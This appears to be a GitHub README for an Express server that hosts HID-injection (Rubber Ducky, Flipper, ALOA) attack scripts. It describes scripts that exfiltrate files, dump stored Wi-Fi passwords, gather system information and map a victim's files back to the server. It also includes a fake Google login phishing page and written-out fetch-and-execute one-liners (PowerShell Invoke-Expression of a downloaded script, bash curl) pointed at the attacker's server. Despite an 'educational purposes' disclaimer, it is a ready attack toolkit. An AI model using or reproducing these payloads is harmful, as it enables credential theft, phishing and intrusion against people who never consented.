Do you have an HID injection device? OMG Cable, ALOA, BADUsb, or Flipper 0? Then this server is for you. Instead of making custom scripts on each device or even your only device, use this server to host your own scripts and be able to receive data from the client running the scripts. For your HID or Ducky scripts change one word and have access to all scripts hosted on the server. I have a few scripts to get you going and a fake login page(for fun). Mac and Linux scripts coming soon.

This project is for educational purposes and not to be used maliciously. This is just for me to get a basic understanding of hosting and serving different file types and understanding the power of HID injection.

• Disclaimer
• Description
• Installation
• Setup
• Scripts
  • setup.py
  • exfiltrateFile(s).ps1
  • infoGather.ps1
  • launchVoice.ps1
  • mapFiles.ps1
  • openWebPageFull.ps1
  • qrCode.ps1
  • ransom.ps1
  • rickRoll.ps1
  • rickRollMac.sh
  • selfDestruct.ps1
  • wifiDump.ps1
  • wifiDumpMac.sh
• Execution
  • Starting the Server
  • Installing pm2 (Optional)
  • Manually Running Scripts
    • PowerShell
    • Bash
  • DuckyScript
    • launchPsScript.txt
    • launchPsScriptAdmin.txt
  • HIDScript (ALOA)
    • launchPsScript.js
    • launchPsScriptAdmin.js
  • Phishing Site
    • notGoogle
  • Downloading Captured Information
    • List Files Endpoint

This is a simple Express Server that allows for scripts to be served and uploads sent to the server. It also allows you to access a collection of Powershell, Bash, Ducky, HID scripts and a fake pishing page. This server includes scripts to launch other scripts or webpages from the server. Making it so that you can change one line of code in your script and give your HID device access to all the scripts on the server.

You should have Node.js installed to begin to installing this project.

In the directory you want to store the project run the command:

git clone https://github.com/Pmacdon15/MacServerFace

Next we will need to install the Node Modules, I will list the commands here:

cd MacServerFace

npm install

For easy setup download and install Python if you haven't already.

https://www.python.org/downloads/

or

sudo apt-get update
sudo apt-get install python3

Then after navigating to the project folder in the terminal run:

(on Windows)

py setup.py

(on Mac or linux)

python3 setup.py

This will allow you to enter a new Ip Address or localhost and automatically change all the Powershell, Ducky, HID scripts to reflect the entered Ip address.

I recommend using pm2 so that you can do other things on your terminal while running the server, like checking the capturedInfo folder after running a script on a client's computer.

npm install pm2 -g

This script will update the url of all scripts, so that you can easily set the Ip address of your server.

This Script will transfer file(s) With specified path and sends them to the server's uploads directory.

This script gathers computer name / username , Ip address, Os version and current Wlan profile and password. Then it makes a temporary file and sends it to the server, then deletes the file.

This script simply plays a computer voice over the client's computer, It can be updated to say anything you wish.

This script list all files and directories on the clients computer in the capturedInfo directory. Files are listed and saved to a file then to the server and deleted from the temporary folder.

This script will open a weg page in MS Edge and full screen it. Useful for using the built in fake pishing pages.

This Downloads a Qr Code to the clients computer and opens it for them to see.

This script is a bit of a joke, it plays a computer voice stating your files have been encrypted. Then a progress bar is displayed, then and error message, after clicking ok the computer will go to the lock screen and no harm will have been done.

Fairly self explanatory opens Microsoft Edge full screens the video and it should play a rick roll.

Rick Roll for Mac although I have not had time to test it yet.

This script is a prank with a count down and progress bar. Nothing happens the bar fills up and the program exits.

This script dumps all Wlan profiles on a clients computer with a clear Key and sends them to the server.

This should dump all the Wlan profiles on the client's computer although I have not had time to test it yet.

To start the server

node server.js

or

(on linux)

npm install -g pm2

or if you installed pm2

pm2 start server.js --name pickAServerName

After the server is running you can manually call a script make sure ipaddress and scriptname are updated(ipaddress can be updated automatically with setup.py), then enter the above code in to PowerShell. The below code can be found in the powerShell folder file named launchPsScript.ps1

Invoke-Expression ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri "http://<ipaddress>:3002/scripts/<scriptname>.ps1" -UseBasicParsing).Content))

or

bash -c "$(curl -fsSL http://<ipaddress>:3002/<scriptName.sh>)"

Other wise you can use an HID injection device and uses one of the trigger scripts I have provided:

open Ps normal user.

open Ps as admin.

open Ps normal user.

open Ps as admin.

http://<ipaddress>:3002/notGoogle

http://<ipaddress>:3002/listFiles

Allows you to download any information or files you have captured.